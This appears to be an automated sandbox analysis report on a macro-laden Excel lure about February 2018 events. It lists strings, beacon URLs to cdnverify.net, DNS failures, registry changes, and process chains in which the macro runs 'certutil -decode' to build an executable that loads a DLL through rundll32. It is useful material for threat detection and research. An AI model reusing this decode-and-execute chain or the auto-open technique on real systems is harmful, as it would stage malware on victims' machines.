Source: EXCEL.EXE	String found in binary or memory: http://www.netcentric-warfare.com/
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.netcentric-warfare.com/janesWL
Source: EXCEL.EXE	String found in binary or memory: http://www.netcentric-warfare.com/janesWLLXPhttp://www.singaporeairshow.com/public/
Source: EXCEL.EXE	String found in binary or memory: http://www.netcentric-warfare.com/janesWLTLhttp://www.mobiledeployable.com/janesXNhttp://www.mobiled
Source: EXCEL.EXE	String found in binary or memory: http://www.netcentric-warfare.com/janesWLXNhttp://www.mobiledeployable.com/janes?
Source: EXCEL.EXE	String found in binary or memory: http://www.netcentric-warfare.com/janesWLXNhttp://www.mobiledeployable.com/janes?D;jfx
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.netcentric-warfare.com/janesWLyX
Source: EXCEL.EXE	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: EXCEL.EXE	String found in binary or memory: http://www.pki.gva.es/cps0
Source: EXCEL.EXE	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: EXCEL.EXE	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: EXCEL.EXE	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.quovadis.bm0
Source: EXCEL.EXE	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: EXCEL.EXE	String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: EXCEL.EXE	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: EXCEL.EXE	String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: EXCEL.EXE	String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: EXCEL.EXE	String found in binary or memory: http://www.sin?
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.singaporeairshow.com/public/
Source: EXCEL.EXE	String found in binary or memory: http://www.singaporeairshow.com/public/$
Source: EXCEL.EXE	String found in binary or memory: http://www.singaporeairshow.com/public/(
Source: EXCEL.EXE	String found in binary or memory: http://www.singaporeairshow.com/public/y
Source: EXCEL.EXE, Upcoming Events February 2018.xls, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	String found in binary or memory: http://www.singaporeairshow.com/public/yX
Source: EXCEL.EXE	String found in binary or memory: http://www.sk.ee/cps/0
Source: EXCEL.EXE	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: EXCEL.EXE	String found in binary or memory: http://www.ssc.lt/cps03
Source: EXCEL.EXE	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: EXCEL.EXE	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: EXCEL.EXE	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: EXCEL.EXE	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: http://www.usertrust.com1
Source: EXCEL.EXE	String found in binary or memory: http://www.valicert.com/1
Source: EXCEL.EXE	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: EXCEL.EXE	String found in binary or memory: http://www2.public-trust.com/crl/ct/ctroot.crl0
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=uk&passive=true&continue=https://www.google.com/search%3
Source: rundll32.exe, search[1].htm0.5.dr, search[1].htm.5.dr	String found in binary or memory: https://apis.google.com
Source: EXCEL.EXE	String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/1WrCB/QYppp/ppp.rfc822/?po=m5qtBZgkYmShCHp1
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/5dlbB/d6j6Hy/uJWx2i/nEJ2Ti.vnd.wmc/?Z=wISZMsM6VlP6Fk5CogU=
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/Lza/lh/fRI/rv/Rl.3gpp/?0O=bvC
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/V/Q63k.vnd.radisys.msml-basic-layout/?Gk=GJeIDxspR24iBV9/ehY=
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/YE34ul/zzcIl.vnd.wmc/?mZ=2F8sKNvh40nizftYut4=R
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/YE34ul/zzcIl.vnd.wmc/?mZ=2F8sKNvh40nizftYut4=l
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/qHSgh/mtK/jYhQ.ktx/?eJ=GFrmBRvkKWQiyDF1ets=
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/qHSgh/mtK/jYhQ.ktx/?eJ=GFrmBRvkKWQiyDF1ets=h
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/rYkfwh/dXu/e9/sO/sGx.ktx/?69q=zgiXBM22WGX0mkB0rIk=
Source: rundll32.exe	String found in binary or memory: https://cdnverify.net/rYkfwh/dXu/e9/sO/sGx.ktx/?69q=zgiXBM22WGX0mkB0rIk=:_
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://drive.google.com/?tab=wo
Source: rundll32.exe	String found in binary or memory: https://google.com/
Source: rundll32.exe	String found in binary or memory: https://google.com/x/6lc/56/sr/Q/KfBChxu.rfc822/?Id=oVpjYaLkrACbyLQRw9s=
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://id.google.com/verify/AIoQP3irTQd8DL7DouVrnjEo2Q-XrONubf0PoSrc7skd3oX4wycq7I1O_WvtUb1G8RFRINE
Source: rundll32.exe	String found in binary or memory: https://ipv4.google.com/d
Source: rundll32.exe	String found in binary or memory: https://ipv4.google.com/r
Source: rundll32.exe	String found in binary or memory: https://ipv4.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3DQ8mirPOU8hXMv%26gws
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://maps.google.com.ua/maps?hl=uk&tab=wl
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://maps.google.com/maps?q=Q8mirPOU8hXMv&um=1&ie=UTF-8&sa=X&ved=0ahUKEwi6xdfi4Mr
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://news.google.com.ua/nwshp?hl=uk&tab=wn
Source: EXCEL.EXE	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://oilmart.com.ua/shop/category/oil/motor-oil/q8
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: rundll32.exe, search[1].htm0.5.dr, search[1].htm.5.dr	String found in binary or memory: https://plusone.google.com/u/0
Source: EXCEL.EXE	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: EXCEL.EXE	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: EXCEL.EXE, rundll32.exe	String found in binary or memory: https://secure.comodo.com/CPS0
Source: search[1].htm.5.dr	String found in binary or memory: https://ssl.gstatic.com/gb/images/silhouette_24.png
Source: rundll32.exe, search[1].htm0.5.dr, search[1].htm.5.dr	String found in binary or memory: https://ssl.gstatic.com/gb/images/silhouette_96.png
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://support.google.com/websearch?p=ws_settings_location&hl=uk
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://translate.google.com.ua/?hl=uk&tab=wT
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.blogger.com/?tab=wj
Source: EXCEL.EXE	String found in binary or memory: https://www.catcert.net/verarrel
Source: EXCEL.EXE	String found in binary or memory: https://www.catcert.net/verarrel05
Source: EXCEL.EXE	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: EXCEL.EXE	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: rundll32.exe	String found in binary or memory: https://www.geotrust.com/resources/repository0
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/=K
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/N
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/OK
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us#1
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us#1m
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us#1y
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us)
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/us/us4
Source: EXCEL.EXE	String found in binary or memory: https://www.globalsofsymposium.org/x
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com.ua/domainless/read?igu
Source: search[1].htm0.5.dr	String found in binary or memory: https://www.google.com.ua/intl/uk/options/
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com.ua/search?hl=uk&tbm=isch&source=og&tab=wi
Source: rundll32.exe	String found in binary or memory: https://www.google.com/
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com/calendar?tab=wc
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com/flights?q=Q8mirPOU8hXMv&source=lnms&tbm=flm&sa=X&ved=0ahUKEwi
Source: rundll32.exe	String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: rundll32.exe	String found in binary or memory: https://www.google.com/search%3Fq%3DQ8mirPOU8hXMv%26gws_rd%2520%3D%2520cr
Source: search[1].htm0.5.dr	String found in binary or memory: https://www.google.com/search?q%3DQ8mirPOU8hXMv
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com/search?q%3DQ8mirPOU8hXMv#languages
Source: rundll32.exe	String found in binary or memory: https://www.google.com/search?q=Q8mirPOU8hXMv&gws_rd%20=%20cr
Source: rundll32.exe	String found in binary or memory: https://www.google.com/search?q=Q8mirPOU8hXMv&gws_rd%20=%20cr
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.google.com/webhp?hl=uk&sa=X&ved=0ahUKEwi6xdfi4MrZAhURHGMKHc0pDzAQPAgE
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.googleadservices.com/pagead/aclk?sa=L&ai=DChcSEwjI5d3i4MrZAhXLkX4KHY6kCJkYABAAGgJwYw
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.hybrid-analysis.com/.../cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b...
Source: search[1].htm0.5.dr	String found in binary or memory: https://www.hybrid-analysis.com/sample/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e
Source: EXCEL.EXE	String found in binary or memory: https://www.netlock.hu/docs/
Source: EXCEL.EXE	String found in binary or memory: https://www.netlock.net/docs
Source: rundll32.exe, search[1].htm0.5.dr	String found in binary or memory: https://www.youtube.com/results?gl=UA&tab=w1
Source: rundll32.exe	String found in binary or memory: https://wwwCn

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186

Domain name seen in connection with other malware

Show sources

Source: Joe Sandbox View

Domain Name: bit.ly

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View	IP Address: 67.199.248.11
Source: Joe Sandbox View	IP Address: 67.199.248.11

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: BITLY-AS-BitlyIncUS

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /events?page=1 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: www.janes.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /18GSS_Janes HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateHost: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /us HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.globalsofsymposium.org

Tries to resolve many domain names, but no domain seems valid

Show sources

Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cdnverify.net replaycode: Name error (3)

Boot Survival:

Creates or modifies windows services

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Outlook\Performance

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\ProgramData\M4P9S1S3.exe	File created: C:\Users\user\AppData\Local\cdnver.dll
Source: C:\Windows\System32\certutil.exe	File created: C:\ProgramData\M4P9S1S3.exe

Drops PE files to the application program directory (C:\ProgramData)

Show sources

Source: C:\Windows\System32\certutil.exe

File created: C:\ProgramData\M4P9S1S3.exe

May use bcdedit to modify the Windows boot settings

Show sources

Source: EXCEL.EXE	Binary or memory string: bcdedit.exe5
Source: EXCEL.EXE	Binary or memory string: bcdedit.exe

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\rundll32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\rundll32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\rundll32.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_002413F7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,

4_2_002413F7

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00243386 push ecx; ret

4_2_00243399

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	Stream path '_VBA_PROJECT_CUR/VBA/LinesOfBusiness' : High number of string operations
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	Stream path '_VBA_PROJECT_CUR/VBA/LinesOfBusiness' : High number of string operations

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_0024986D FindFirstFileExA,

4_2_0024986D

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

Window found: window name: SysTabControl32

Found GUI installer (many successful clicks)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Automated click: Next >
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Automated click: Next >
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Automated click: Next >

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: D:\office\Target\XL\X86\ship\1033.pre\xlintl32.PDB source: EXCEL.EXE
Source:	Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: EXCEL.EXE
Source:	Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: EXCEL.EXE
Source:	Binary string: scrrun.pdb source: EXCEL.EXE

Binary contains paths to development resources

Show sources

Source: EXCEL.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal80.evad.expl.troj.winXLS@9/42@41/6

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00241957 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetCurrentProcess,LoadLibraryW,GetProcAddress,AdjustTokenPrivileges,AdjustTokenPrivileges,AdjustTokenPrivileges,

4_2_00241957

Contains functionality to enum processes or threads

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00241C3D CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

4_2_00241C3D

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Upcoming Events February 2018.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR9E3B.tmp

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: Upcoming Events February 2018.xls	OLE indicator, Workbook stream: true
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE indicator, Workbook stream: true
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE indicator, Workbook stream: true

Found command line output

Show sources

Source: C:\Windows\System32\certutil.exe	Console Write: ........l...]..w....I.n.p.u.t. .L.e.n.g.t.h. .=. .1.7.8.2.3.2........n30........R.a.............-.^w....*...0.....A.....
Source: C:\Windows\System32\certutil.exe	Console Write: ........h...]..w........#...w..w..0.....D...L.......c.......#.......................R.a.........).^w........,...........
Source: C:\Windows\System32\certutil.exe	Console Write: ........l...]..w....O.u.t.p.u.t. .L.e.n.g.t.h. .=. .1.3.3.6.3.2.................R.a.........).^w-.^w....,...0.....A.....
Source: C:\Windows\System32\certutil.exe	Console Write: ........h...]..w........#...w..w..0.....D...L.......k.......#.......................R.a.........).^w........,...........
Source: C:\Windows\System32\certutil.exe	Console Write: ............]..w........#...w..w..0.....D...L.......o.......#........................C......y..a..^w....b...X.....A.....
Source: C:\Windows\System32\certutil.exe	Console Write: ............]..w........#...w..w..0.....D...L.......s.......#............................C........^w........T...........

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Runs a DLL by calling functions

Show sources

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Users\user\AppData\Local\cdnver.dll',#1

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: Upcoming Events February 2018.xls

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Source: unknown	Process created: C:\Windows\System32\certutil.exe certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe
Source: unknown	Process created: C:\ProgramData\M4P9S1S3.exe C:\Programdata\M4P9S1S3.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Users\user\AppData\Local\cdnver.dll',#1
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE 'C:\PROGRA~1\MICROS~2\Office14\OUTLOOK.EXE' -c IPM.Note /m 'mailto:tchung@smi-online.co.uk'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\certutil.exe certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\ProgramData\M4P9S1S3.exe C:\Programdata\M4P9S1S3.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE 'C:\PROGRA~1\MICROS~2\Office14\OUTLOOK.EXE' -c IPM.Note /m 'mailto:tchung@smi-online.co.uk'
Source: C:\ProgramData\M4P9S1S3.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Users\user\AppData\Local\cdnver.dll',#1

Uses an in-process (OLE) Automation server

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Writes ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

File written: C:\Windows\inf\Outlook\0009\outlperf.ini

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cerAD5F.tmp

Deletes Windows files

Show sources

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cerAD5F.tmp

Detected potential crypto function

Show sources

Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_002518C4	4_2_002518C4
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_0024C980	4_2_0024C980
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_00244D84	4_2_00244D84
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_0024CE2E	4_2_0024CE2E

Document contains embedded VBA macros

Show sources

Source: Upcoming Events February 2018.xls	OLE indicator, VBA macros: true
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE indicator, VBA macros: true
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Show sources

Source: Joe Sandbox View

Dropped File: 12E6642CF6413BDF5388BEE663080FA299591B2BA023D069286F3BE9647547C8

Reads the hosts file

Show sources

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

Unable to load, office file is protected or invalid

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

Window title found: add new account add new e-mail accounte-mail &accountte&xt messaging (sms)&manually configure server settings or additional server types&your name:example: ellen adams&e-mail address:example: ellen@contoso.com&password:re&type password:type the password your internet service provider has given you.< &back&next >cancel

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Sub Auto_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Auto_Open	Name: Auto_Open
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Private jbxstatic_Auto_Open_1548 As Boolean
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Sub Auto_Open()
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If Not jbxstatic_Auto_Open_1548 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: jbxstatic_Auto_Open_1548 = JbxLog("function:Auto_Open")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Private jbxstatic_Auto_Open_1548 As Boolean
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Sub Auto_Open()
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If Not jbxstatic_Auto_Open_1548 Then
